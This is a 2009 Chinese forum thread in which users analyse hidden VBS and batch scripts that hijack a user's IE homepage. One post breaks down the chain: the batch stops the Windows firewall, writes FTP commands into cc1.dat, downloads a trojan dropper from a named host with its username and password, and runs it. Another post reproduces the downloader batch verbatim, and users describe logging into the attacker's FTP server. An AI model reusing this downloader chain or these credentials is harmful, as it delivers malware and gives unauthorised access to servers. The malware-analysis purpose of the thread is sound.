主页老是被改，大家帮忙看看这些脚本

显示全部楼层 · 发表于 2009-6-14 17:42:43

ie主页老是被改，每次都是不一样的，不过都是那种导航网页，用360木马专杀，发现2个可疑启动项：

名称:AutoRuns 类别:可疑启动项

文件路径:C:\WINDOWS\yyuhh\sv.vbs

修复情况:禁止自启动

注册表路径:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

注册表的项名:36tray

服务器安全级别: 0判断级别: 0

名称:AutoRuns 类别:可疑启动项

文件路径:C:\WINDOWS\loty\spoolsv.vbs

修复情况:禁止自启动

然后到windows目录下找到的这2个隐藏文件yyuhh和loty，详见附件

希望哪位高手可以分析下那些脚本，让我们了解学习下。

[ 本帖最后由穷开心于 2009-6-14 18:48 编辑 ]

显示全部楼层 · 发表于 2009-6-14 17:55:12

14/6/2009 17:55:33 Detected: Trojan.Win32.Chifrax.a C:\Documents and Settings\kato\桌面\loty.rar/loty\8858.exe/bao888.exe

to kl

[ 本帖最后由 sam.to 于 2009-6-14 17:56 编辑 ]

显示全部楼层 · 发表于 2009-6-14 18:10:31

--> loty\8858.exe
   [1] Archive type: RAR SFX (self extracting)
   --> bao888.exe
      [DETECTION] Is the TR/Dropper.Gen Trojan
   --> setup_7.exe
      [DETECTION] Is the TR/Crypt.ZPACK.Gen Trojan

显示全部楼层 · 发表于 2009-6-14 18:11:01

因为找不到多少顺序关系，可能会有点乱
1.vbs
出现两个分支，一个是等待108000毫秒执行2.bat
一个是等待1700000毫秒后后执行win20.bat

分支1
2.bat将C:\WINDOWS\loty设置为隐藏、系统、存档属性
将注册表12.reg导入
12.reg设置隐蔽自启动，地址是C:\\WINDOWS\\loty\\spoolsv.vbs【自启动内容等会说】

分支2
//分支一启动如果失败不影响分支二启动
等待1700000毫秒后后执行win20.bat
启动ping程序（目的和等待XXXX秒一样）
使用SC命令停止WINDOWS防火墙
用echo命令将以下FTP命令输入至cc1.dat，内容为：
《《《《《《《《《《《《《《《《《《
连接FTP至www.xing885.cn
用户名是xing885
密码是zhenhao88
进入目录wwwroot
使用二进制下载8858.exe
退出
》》》》》》》》》》》》》》》》》》》
执行完毕后恢复WINDOWS防火墙
删除cc1.dat
执行下载下来的8858.exe
8858.exe是一个自解压的WINRAR
会执行bao888.exe、setup_7.exe
以上两个程序非批处理，稍后分析
==================================================================
spoolsv.vbs自启动分析
启动后等待4200500毫秒
执行C:\WINDOWS\loty\win21.bat
win21.bat和win20.bat相似，但是下载下来的是8888.exe

分析完成
注：以上的执行都是隐藏执行，用户不会看到任何窗口

显示全部楼层 · 发表于 2009-6-14 18:13:22

8858.exe网址是???

显示全部楼层 · 发表于 2009-6-14 18:16:29

貌似对我对FTP的解释有点问题

显示全部楼层 · 发表于 2009-6-14 18:18:29

用ftp工具打开吧

显示全部楼层 · 发表于 2009-6-14 18:22:17

是一个FTP，但是很奇怪的是Flashfxp无法连接上去
ftp://www.xing885.cn/wwwroot/8858.exe
用户名和密码分别是xing885和zhenhao888
但是没有办法使用Flashfxp连接...只能使用FTP命令
请求方式：
将下列文件保存为后缀为bat的
@echo open www.xing885.cn 21>cc1.dat
@echo xing885>>cc1.dat
@echo zhenhao888>>cc1.dat
@echo cd wwwroot>>cc1.dat
@echo binary>>cc1.dat
@echo get 8858.exe>>cc1.dat
@echo bye>>cc1.dat
cmd /k ftp -s:cc1.dat
即可

显示全部楼层 · 发表于 2009-6-14 18:24:16

想把他密码改了，不允许改！

[ 本帖最后由穷开心于 2009-6-14 18:32 编辑 ]

显示全部楼层 · 发表于 2009-6-14 19:25:17

刚才用ie进ftp了，现在进不了了，可能被发现了
谢谢各位

[ 本帖最后由穷开心于 2009-6-14 19:41 编辑 ]

[可疑文件] 主页老是被改，大家帮忙看看这些脚本

本帖子中包含更多资源

回复 4楼 aarwwefdds 的帖子

回复 6楼 aarwwefdds 的帖子

回复 5楼 sam.to 的帖子

本帖子中包含更多资源

浏览过的版块